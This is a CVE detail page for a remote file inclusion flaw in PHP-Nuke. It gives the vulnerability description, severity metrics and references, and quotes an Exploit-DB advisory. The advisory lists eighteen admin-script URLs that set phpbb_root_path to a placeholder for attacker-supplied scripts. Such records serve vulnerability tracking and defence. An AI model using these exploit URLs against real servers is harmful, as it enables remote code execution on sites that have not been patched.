CVE-2006-2828 : Detail

CVE-2006-2828

3.2%V4
Network
2006-06-05
18h00 +00:00
2018-10-18
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Global variable overwrite vulnerability in PHP-Nuke allows remote attackers to conduct remote PHP file inclusion attacks via a modified phpbb_root_path parameter to the admin scripts (1) index.php, (2) admin_ug_auth.php, (3) admin_board.php, (4) admin_disallow.php, (5) admin_forumauth.php, (6) admin_groups.php, (7) admin_ranks.php, (8) admin_styles.php, (9) admin_user_ban.php, (10) admin_words.php, (11) admin_avatar.php, (12) admin_db_utilities.php, (13) admin_forum_prune.php, (14) admin_forums.php, (15) admin_mass_email.php, (16) admin_smilies.php, (17) admin_ug_auth.php, and (18) admin_users.php, which overwrites $phpbb_root_path when the import_request_variables function is executed after $phpbb_root_path has been initialized to a static value.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.4 AV:N/AC:L/Au:N/C:P/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1866

Publication date : 2006-06-01 22h00 +00:00
Author : ddoshomo
EDB Verified : Yes

# Milli-Harekat Advisory ( www.milli-harekat.org ) # PHP-Nuke <= All version - Remote File Include Vulnerabilities # Risk : High # Class: Remote # Script : PHP NUKE ALL VERSION # Credits : ERNE # Thanks : Dj_ReMix,Eskobar,TR_IP,ßy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS # Vulnerable : http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts] http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts] # milw0rm.com [2006-06-02]

Products Mentioned

Configuraton 0

Php-nuke>>Ev >> Version *

References

http://securityreason.com/securityalert/1040
Tags : third-party-advisory, x_refsource_SREASON